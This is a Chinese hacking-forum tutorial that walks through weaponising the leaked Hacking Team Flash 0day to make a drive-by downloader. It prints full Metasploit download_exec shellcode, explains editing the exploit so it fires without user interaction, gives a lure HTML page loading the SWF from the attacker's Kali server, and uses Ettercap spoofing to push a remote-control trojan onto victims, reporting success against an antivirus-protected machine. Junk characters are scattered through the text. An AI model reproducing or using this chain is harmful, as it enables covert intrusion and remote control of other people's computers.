三、flash 0day之手工代码修改制作下载者实例入侵演示
& _& W' M/ d5 t# Y. E. w 利用到的工具: ! v$ o3 ~, h- `7 t
+ e" n3 ?2 F$ _: G: o! a& h0 U Msf
+ f/ h0 y2 h% B) G& k" f. T% u$ K- { H/ q7 m3 q! { Ettercap " ]! p; N; v) \) Y6 N/ H9 g
6 B; F( }+ p7 r$ H, ~2 r) J- h# s& O: i Adobe Flash CS6 : k7 @ X7 o- `1 ^) R8 p# \
0 h+ y/ X; n) D5 W! J, {Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
6 K9 x9 m0 y4 @6 O* E* @; P r" _. q+ I4 @$ N/ u3 h5 Q7 ?2 V1 g9 V( ?. j% @ 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 5 `+ H5 J3 W; {$ |# [
如图:
# L) r. y7 b% u% g3 b/ Y3 Z. u! P% x+ b; f" [# K M( L
1 ?3 n3 g& ? N: r1 K% O, H& X4 Y8 Z2 Z
3 D0 a0 F: v. ?* A; o3 r3 Y
6 s; B9 Z& c' d. R 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 1 o, T( U# y7 N$ }! O- P
6 a/ q/ w, d1 Y! f+ [
然后执行generate -t dword生成shellcode,如下: ( Q% j$ @! B! B
8 L( s6 E- m0 I' q! m
1 ]1 s! s9 R: A4 ]
- Y* a1 L& |+ J( E) A3 f 复制代码到文本下便于我们一会编辑flash exp,如下:
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
" W4 q# b+ C6 R5 I5 x( ^1 c. {% ?/ N/ o1 M p 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
3 b& `; _# E/ V5 @+ v1 ?0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
. q1 ^ |0 \) S7 R9 E5 d9 \, ]' E/ A- z3 O' m6 B 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, ( w! W$ g0 ~' J% K& g: \8 r; l
, i$ n; w/ v# V# T% F: s 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, / X2 h$ u: ?; J3 {
: H) K4 d1 }/ ]8 ^8 E* ? 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
+ u. V2 v2 @1 A- ` _+ j- ^0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, - Y* f) b8 j- s. N; a
& y6 a' Z4 t5 }; }/ F% J8 I0 E K) ^& T4 q4 T, k 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, / \4 ]8 J1 ~4 p5 `' u+ x" A
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
- ^, K$ \& D# h) c/ c 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
4 R' Z# z0 Y3 ~/ C4 M 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
- ]4 c# C, A5 p0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 4 x+ B2 Y6 g/ `8 t+ n
# w& ]( q Q/ h6 {! d
. n- I6 F8 ~ U- r6 M+ Z# z
4 t6 K1 D( m; W8 }% v. c下面我们来修改flash 0day exp,需要修改三个文件,分别为: ; c4 z6 K8 r0 ^: {# j! y
* u. k q9 I1 s, l. f( F
& f6 ^; n' M- L' \1 B) ?) E( { 先修改ShellWin32.as,部分源代码如图:
" @+ C4 |! c5 F; Y8 t& D, P
; B7 Q- x4 }; d2 K% t
& w4 o9 L" g. I0 l5 H: G 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
4 r) s$ i8 G3 y# i# i3 G9 E- q6 d& d- P# h% z3 j
- U+ l" @# ]' U5 V) {7 P3 R5 j
. _1 d6 K0 O, p: W: e 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: , d! H) p$ V$ q' i) @2 S$ D/ t6 X4 I: K& _
% d% s, w7 l. R$ D. T% G) f% w5 m0 d0 @, T1 t, n0 `7 T2 m8 }; A
3 H- v& }8 n# ?* s% _9 t 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
& P$ S+ y" ^/ M" {5 Re e" t# H; F0 B, `& z( N. R& R
+ }$ O7 I z5 t/ z! Y: Tb. d" l1 w4 x! r m7 L: A
% p% ~4 V0 J" j& u
5 c8 u! D3 r0 q& |) T& q9 j; u
3 _" k+ `4 i% @) `, P 然后点保存,下面我们来编译一下,打开
) `' {6 A# d! C* ~- u- A, ^7 Kexp1.fla然后点文件-发布,看看编译没错误
# v: Z5 i% g+ |) O0 y. b) J- K' s5 ?9 J : u1 [9 ]" m3 {2 O
% {% w, a; M: Z5 @4 k. f- a" X. ?$ ]: E3 P5 H; e3 V6 R, F
6 g# k" ~" o H5 Z/ a
# |$ U: P9 }" U* x8 V
4 u9 h( Z( B7 S3 o$ w" A 然后我们把生成的 1 A% [0 {% u" ^# j# O( K
; P' S+ C7 n( V2 nexp1.swf丢到kailinux 的/var/www/html下: 9 g9 L" R N$ g3 X
然后把这段代码好好编辑一下 ! j7 g! v( K2 C# ]2 o( J$ p) [
# o( G( n2 D/ f" M2 w8 _/ w
6 [* A7 Q- l% T& {+ U6 b$ Z4 b! e8 ]$ n
1 o/ \ P& f# C$ ~
: G" l/ F1 J7 Q7 ], N" {$ J
4 b* i8 Z% E/ ^3 C' c. c( U# D/ s
8 b9 I4 l9 Q' }1 c. E0 Z3 z5 B, T; O, e3 k& i% x* n9 t
<!DOCTYPE html> ' _: n* M8 i/ `5 ^; v
$ ]! t1 Y! T/ p<html> 8 X# z# Q& d m$ \0 G* K! P
<head> L& ^0 w( l5 G6 T' R
7 a% D* n2 C: Y( \$ S4 Z6 P! ~ <meta http-equiv="Content-Type" content="text/html; / F7 W. z" Z: r$ {& _/ N& ?+ M
; h' V' I( L% I) x. g( x3 G0 y5 p' W1 E& k/ } charset=utf-8"/>
$ L% Q9 m- S1 i( J" u& [9 b </head>
6 b8 \' W6 M: H <body>
<h2> Please wait, the requested page is loading...</h2> 1 L7 e4 D2 c! H. r V% d0 b# q2 d1 t
" }' N" Y# F3 b+ x0 i* g <br>
<OBJECT
classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><
ARAM NAME=movie 3 o" [' X7 ^" A) Z, |' \
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ) }4 o0 A! I [$ T# V1 w0 _
9 h& a$ Q: i8 r% j3 X: ~2 O0 W</body>
4 [) J6 a! }; n' X O( Q$ a5 ?( x5 \/ u" q) A$ d <script> . u( q' ~1 E; ~5 _6 t
. v3 H1 k( B& M- B& t% R: O, F" z/ p ] setTimeout(function () { 2 r5 f% Q2 I5 w1 ]5 ~' t# u% k7 ?
5 y! I9 N* f1 j3 ~7 M1 ?! g0 R6 d7 \
window.location.reload();
, {. E6 l* a2 X# z% Y5 a}, 10000);
/ V2 m# G' \7 p0 ~1 m6 s, L4 C8 C5 T, q5 k) Y+ @, e, p' D4 T
</script>
' o2 x' O! ~. I# V6 [8 x; P/ y+ Z' P4 l2 B$ [ </html> ( N+ W0 g. u2 a J4 K: Y% \
% P, o% E' Q! V# p
0 [* \- G) b4 R. l: q& I注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: " ^- I2 w- C& D$ E! H2 N5 k
4 p |7 I& J; u4 \0 g0 t ! t7 ?* P& g8 M6 L/ }
3 y8 G9 S, n6 r0 T o( c) h* E
% Y) x9 Q" \& \8 v4 R * r. K: n, Y! o+ i
6 Q. ?+ O. C. b5 r& s8 g( t1 V
下面我们用ettercap欺骗如图: # `$ @+ {$ ?! p+ U o5 ^
3 s, }$ ?3 C c' B9 N9 P0 Q' w3 Y1 Y2 ]/ s7 P7 H( n- a5 s0 r s
2 C4 A0 I9 m2 h2 s5 t$ l6 s
8 \" b. |3 g0 i N - h8 w; ?: n7 f
/ l5 k {/ V3 \2 v* G4 K 下面我们随便访问个网站看看:
4 y/ H8 t4 E" j0 _6 E, z( _. H h% u5 M4 a" p, s M 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
我们看另一台,
* J! F: d2 x: @7 x z/ @% h- e4 G& @
提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |